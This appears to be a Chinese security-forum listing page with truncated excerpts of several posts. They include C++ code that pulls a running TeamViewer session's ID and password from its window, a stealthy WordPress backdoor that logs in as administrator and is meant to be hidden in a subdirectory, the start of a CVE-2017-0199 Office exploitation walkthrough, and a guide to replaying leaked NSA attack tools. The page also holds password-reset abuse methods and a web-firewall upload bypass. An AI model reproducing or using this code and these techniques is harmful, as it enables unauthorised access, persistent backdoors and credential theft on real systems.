一件获取运行中的TeamViewer的账号和密码(附源码)

#define WIN32_LEAN_AND_MEAN#include <windows.h>#include <iostream>#pragma comment( lib, "kernel32" )#pragma comment( lib, "user32" )
 int status = 0;
 BOOL CALLBACK EnumMainTVWindow(HWND hwnd, LPARAM lParam){
        const int BufferSize = 1024;
        char BufferContent[BufferSize] = "";
        SendMessage(hwnd, WM_GETTEXT, (WPARAM)BufferSize, (LPARAM)BufferContent);
       
        if (status == 1)
        {
                printf("%s\n", BufferContent);
                status = 0;
        }
 
        if (strstr(BufferContent, "Allow Remote Control") != NULL)


任意用户密码重置的10种姿势

以前安全测试最爱挖的就是任意用户密码重置,今天看了carry_your师傅在ichunqiu上的视频文字总结一下任意用户密码重置的10种姿势:1,短信验证码可爆破;视频案例中输入手机号码、图片验证码就可以获取短信验证码,并且新密码也是在一个页面中,但是输入短信验证码之后,后端有个请求会判断短信验证码是否正确,错误的话页面会有提醒。攻击者可以用这个请求来爆破验证码,获取到正确的短信验证码之后就可以重置任意用户密码了。缺陷主要是两个方面,第一,未对短信验证码的失效时间进行限制;第二,功能设计存在缺陷

乌云引擎2.1

乌云已经关闭,但是上面有很多有用的帖子,历史漏洞,大家可以通过此工具来查看乌云历史提交。此工具仅用于学习交流。软件名:[箫启灵]乌云引擎版本:2.0运行环境:.NET4.5   系统W7以上。软件功能:搜索乌云历史漏洞。检测自身站点,提高自身站点防御。软件界面与功能截图:   下载地址:https://pan.baidu.com/s/1hsCCGJU

OFFICE OLE2LINK(CVE-2017-0199)漏洞利用详解

漏洞概述FireEye最近公布了一个OFFICE 0day,在无需用户交互的情况下,打开word文档就可以通过hta脚本执行任意代码。经过研究发现,此漏洞的成因主要是word在处理内嵌OLE2LINK对象时,通过网络更新对象时没有正确处理的Content-Type所导致的一个逻辑漏洞。漏洞利用方法首先准备一台apache服务器,web根目录下保存一个1.rtf文件,内容如下:test789<script>var objShell = new A

ShadowBroker释放的NSA工具部分(windows)fb.py复现和中招检查方法

工具下载1、Python2.6和pywin32安装包(注意都是32位的,不然会导致调用dll payload文件失败):复现python和pywin32安装包   2、Shadowbroker放出的NSA攻击工具https://github.com/misterch0c/shadowbroker3、中招检查工具中招检查工具注:检查工具已重写了(各有所需,你可以根据自己需要修改)一、 漏洞复现1.    前期准备攻击系统信息列表如下:IP

手把手教你如何搭建自己的渗透测试环境

介绍白帽子是指个体发起的黑客攻击,找到系统潜在的可能被恶意黑客利用的的漏洞或脆弱点。在目标不知情或者没得到授权的情况下发起黑客攻击是非法的。所以通常是建立一个自己的实验室,练习黑客技术。在这个实验室里,你能看到如何创建一个自己的黑客环境,练习各种各样的黑客攻击技术。我们将会探讨不同类型的虚拟系统,构建一个虚拟网络,在虚拟环境中运行试用版的操作系统,搭建一个有漏洞的web应用程序,安装Kali LInux,执行渗透测试。所需条件:VMware WorkstationWindows XP系统映像Ka

IoTSeeker:物联网设备默认密码扫描检测工具

14828134627729.jpg

猥琐的wordpress后门

一个可以自动调用管理员帐号登录wordpress后台的方法。
<?php

    require('../../../wp-blog-header.php'); //我基本都是放到3级目录下。也可以放到根目录,但是容易被发现。
    $query_str = "SELECT ID FROM $wpdb->users";
    $user_ids = $wpdb->get_results($query_str);
    foreach ($user_ids as $uid) {
        $user_id = $uid->ID;
        if (user_can($user_id, 'administrator')) {
            $user_info = get_userdata($user_id);
            $user_login = $user_info->user_login;
            wp_set_current_user($user_id, $user_login);


改包上传 绕过安全狗

03.png

乌云社区zone 200+篇文章打包下载

QQ截图20161102104934.jpg